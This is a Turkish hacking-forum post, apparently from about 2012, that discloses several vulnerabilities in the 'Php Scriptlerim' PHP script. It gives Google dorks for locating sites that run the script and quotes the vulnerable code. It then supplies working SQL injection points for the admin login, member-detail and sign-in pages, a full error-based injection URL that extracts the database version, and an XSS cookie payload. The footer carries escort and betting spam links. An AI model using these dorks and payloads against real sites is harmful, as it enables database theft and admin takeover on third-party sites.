Powered by Php Scriptlerim Multi Vulnerability

x-Qey

x-Qey

Özel Üye
Katılım
21 Eyl 2012
Mesajlar
1,843
Tepkime puanı
0
Puanları
0
Yaş
30
Powered by Php Scriptlerim Multi Vulnerability
Test : Kali Linux /Linux
Autor : GRAY HAT
Dorks : "Powered By : Php Scriptlerim" "İletişim : info@phpscriptlerim.com" (TR )
1.

SQL İNJ : yonetim/index.php
Panel Code : ($query = mysql_query("SELECT * FROM administrator WHERE username='$username'");

EXP : http://localhost/phpscriptlerim/yonetim/index.php

Post Code : username=admin( SQL İNJ BURAYA )&password=admin&gonder=Giri%C5%9F+Yap
2.
SQL Inj : uyedetay.php


Üye Code : mysql_query("select * from uyeler where sefurl='$url'"); $url = $_GET['url'];
EXP : http://localhost/phpscriptlerim/uyedetay.php?url=ETHİCAL( SQL İNJ BURAYA )

http://localhost/phpscriptlerim/uyedetay.php?url=ETHİCAL%27%20AND%20%28SELECT%203581%20FROM%28SELECT%20COUNT%28*%29,CONCAT%28version%28%29,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27Hvkg%27=%27Hvkg
XSS : uyebilgileri.php

if(isset($_POST['gonder'])){



$text = $_POST['text'];

$text1 = $_POST['text1'];

$password = $_POST['password'];

$parola = md5($password);



if($text==""||$text1==""){ echo '<font color="red"><b>Alanları boş geçemezsiniz.</b></font><br><br>'; }

<li class="clearfix">

<label>İkinci İsim</label>

<input type='text' name='text' value="<?php echo $bbb['text']; ?>" id='name' maxlength="55" />

<div class="clear"></div>


EXP : http://localhost/phpscriptlerim/uyebilgileri.php

XSS post : text=1"><script>alert(document.cookie)</script>&password=&text1=1"><h3>hh</h3>&gonder=Kaydet
SQL Inj : signin.php

if(isset($_POST['gonder'])){



$email = $_POST['email'];

$sifre = $_POST['sifre'];

$tarih = date('Y-m-d');

$parola = md5($sifre);



if($email==""||$sifre==""){ echo '<font color="red"><b>Bütün alanları doldurmanız gerekmektedir.</b></font><br><br>'; }else{



$xlb = mysql_query("SELECT * FROM uyeler WHERE email='$email'")


EXP : http://localhost/phpscriptlerim/signin.php

SQL Post : email=theethical@facebook.com(SQL İNJ BURAYA )&sifre=1111&security=a4f29&gonder=Giri%C5%9F

Yonetim Panel : http://localhost/phpscriptlerim/yonetim/index.php
 
Cevap yazmak için giriş yap yada kayıt ol.

mersin escort mersin e ticaret bodrum escort fethiye escort alanya escort konya escort marmaris escort bodrum escort vozol puff sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort ankara escort meritking giriş
Üst
Copyright® Ajanlar.org 2012